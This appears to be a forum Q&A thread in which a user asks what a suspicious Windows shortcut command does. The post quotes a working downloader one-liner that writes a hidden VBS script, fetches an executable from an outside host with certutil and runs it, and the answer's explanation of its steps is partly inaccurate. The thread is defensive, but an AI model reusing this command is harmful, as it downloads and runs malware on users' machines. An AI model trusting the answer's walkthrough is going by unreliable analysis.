# How dangerous are cmd scripts?

Tags: windows, cmd

I accidentally clicked on a shortcut that is a script.. The shortcut was:

```
%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?9dKbb7d8ff89ahih=icarian_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"
```

What does it do and should I be concerned?

Comment: I am very curious too. I just downloaded a video file from a torrent on my Linux computer and it looked suspicious enough that I opened it in Kate and got a very similar line of code to what you're seeing. I would love to see what comes out of this. @OP, did anything happen after running it?

Comment: The URL I got was https://coid.xyz/?U8778K3JLDhb8f9h=bedivere_%PROCESSOR_ARCHITECTURE%

Comment: The question asked in the title and the body of the question are not related.

Comment: We cannot review random code for behavior. As you can imagine, we'd be flooded with random code to review.

Answer (score 1):

It seems like it first deleted some visual basic scripts in the directory it was executed in, the scripts had this kind of name: `YOUR_USERNAME.vbs`

Then it downloaded an executable from this website `https://coid.xyz/` which has a name like this: `icarian_[x86 OR x64].exe` and saved it on you computer as: `YOUR_USERNAME.exe`

The website had the default Apache landing page, which is unusual for a legit well configured website.

I then runs that executable and places the output in a visual basic script in the format `YOUR_USERNAME.vbs` and then executes it.

I do not know how dangerous it is, but I would be concerned myself since this is very shady, the website has a certificate issued from [lets encrypt](https://letsencrypt.org/) but don't know how much that would help.

check the contents of the visual basic script to see what it does, since this just downloads the stuff to your computer and runs it.

Comment: Let's Encrypt only validates control of the hostname, so they don't know the identity of the one who requested the certificate.

Comment: Oh I didn't know that, I'll update the answer thank you :)